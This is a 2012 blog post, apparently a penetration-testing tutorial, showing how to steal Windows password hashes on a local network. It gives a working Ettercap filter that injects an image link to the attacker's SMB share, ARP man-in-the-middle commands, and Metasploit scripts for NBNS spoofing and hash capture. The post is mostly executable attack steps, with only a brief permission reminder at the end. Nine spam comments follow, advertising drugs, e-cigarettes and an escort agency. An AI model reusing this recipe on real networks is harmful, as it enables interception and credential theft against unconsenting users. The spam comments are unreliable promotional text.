Monday, July 30, 2012

Using Ettercap to improve NetBIOS attacks



For those of you that have tried out NetBIOS spoofing, (explained ), you know how devastatingly effective this is on an internal network. There are however, times when good crackable hashes just don't seem to be passing your way. Maybe the network is quiet, or you are just getting NTLMv2 hashes that you just can't seem to crack. If only you could somehow force those XP clients to send over their user's LM hashes...

Well... it seems you can with Ettercap, and it works very well too.
One of the great things about Ettercap, is that you can do so much more with man-in-the-middle attacks versus Cain for instance. DNS spoofing, ARP spoofing, iframe injections and many more are possible with this tool. Today though we are going to use a custom filter in an attempt to force the clients, via some HTML injection,  to connect to a fake share on our machine so that we can then harvest their authentication hashes.

Remember, for this attack to work, you will need to be targetting wired clients on the network (unless they are using open or WEP wifi) as we will be actively changing their traffic, and this would not be possible on a WPA network due to the individual client encryption keys being used.

First of all you will need to setup metasploit...
Let's see if we can find some low hanging fruit (XP machines)

use auxiliary/scanner/smb/smb_version



Excellent some target XP machines. Make a note of these IP addresses as we will need to target these with Ettercap next.

Now we need to get out filter configured for Ettercap. As you can see from looking at the filter below, we will be adding in an HTML tag into the web pages that the target will be viewing. This tag will tell the browser that it needs to load an image to display on the page and to load it from a share on your IP.
The image wont be there, but Metasploit will capture these requests, spoof the challenge, and capture the user's hash.

Modify the following filter to your own IP address, and save this as netbios.filter.



 if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Rubbish!")) {
      replace("Accept-Rubbish!", "Accept-gnidocnE");
      msg("Encoding Taken Care Of...\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("head>", "head> <img src=\"
\\\\192.168.20.10\\pixel.gif\"> ");
msg("Replacement Filter Ran.\n");
}



Next, we need to install Ettercap: apt-get install ettercap
then within the /usr/local/share/ettercap folder, run etterfilter /root/netbios.filter -o netbios.ef.
This will complile the filter into a format Ettercap can understand.

We now need to return to Metasploit and setup the netbios spoofing modules to be ready to capture the incoming hashes, you can use the following resource script to save time:


use auxiliary/server/capture/smb
set srvhost 192.168.20.10
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
run
use auxiliary/server/capture/http_ntlm
set srvhost 192.168.20.10
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
set uripath /share
set srvport 80
run
use auxiliary/spoof/nbns/nbns_response
set spoofip 192.168.20.10
run


Once you have this running, we can now start ettercap:

ettercap -TqF netbios.ef -M arp:remote /192.168.20.26,29,30/ /<gatewayIP>/ -i eth0

This will fire up Ettercap in text mode (T) without verbose info (q) and with the netbios filter (F) using the arp spoofing method (M) against the 3 XP clients.

Once the users on these clients start browsing web pages, you should see a flurry of hashes coming your way :0)

Remember to press "q" once you have these hashes so that Ettercap will re-poison them to prevent any network drop-out.



Make sure you have permission first, and have fun folks!

9 comments:

  1. -generic cialis 20 mg onlineviagrancialis: Buy best Generic Cialis 20 MG Online, Buy TADALAFIL 20MG Online Most Popular Sildenafil Citrate Pills. Best Generic Viagra Sildenafil 100mg, Generic Cialis tadalafil 20mg at Viagrancialis.

    ReplyDelete
  2. Wholesale Evod Twist Battery-We all love to look smart evod Twist. Regal Twist combines utility and elegance at the same time.Buy Cheap Best Quality E-Cigarette Evod Twist Batteries on MJTech-E-Cig.

    ReplyDelete
  3. Aesthetic physician Johor Bahru - Revival medical clinic is the best aesthetic clinic & aesthetic medicine in Johor Bahru for all type of surgery. We believe in building a lifelong relationship with you

    ReplyDelete
  4. Suicide help lines in India - OneLife (NGO) is a 24X7 Indian Suicide Hotline (+91-78930 78930) to address the suicidal tendencies, Teen Suicide Prevention & Depression Counseling. Contact us to help suicidal person

    ReplyDelete
  5. MOMNKID your online store for baby products, children's clothing and everything else need children. Here you will find everything from the car seat, playpen and rompers to the high chair really. Since its founding, our online shop offers a huge range of products for children

    ReplyDelete
  6. Elite Vip Models - We are a London based agency, Elite Society Girls takes pride in providing exceptional service based on trust and absolute discretion. Respect for all our escorts comes before everything else.

    ReplyDelete
  7. pakistani dramas - Indian dramas and hum tv dramas prefect collections in online. Phenomenal website for the Pakistani dramas online and indian dramas in Pakistan.Get mobile price in pakistan with mobile network packages and mobile specifications and dramasorigin deal with 3g packages.

    ReplyDelete
  8. Electronic Cigarette Offers-Where to buy vapor cigarette in stores & electronic vapor cigarettes. Electronic cigarette special deal gets your hand on the best deal for electronic cigarette.

    ReplyDelete
  9. Flekkvis Håravfall-Planta hårfibre er sikkert, 100% naturlig og rimelig, og de er også svært enkle å bruke. Flekkvis Håravfall, Håravfall Hos Kvinner & Håravfall Men

    ReplyDelete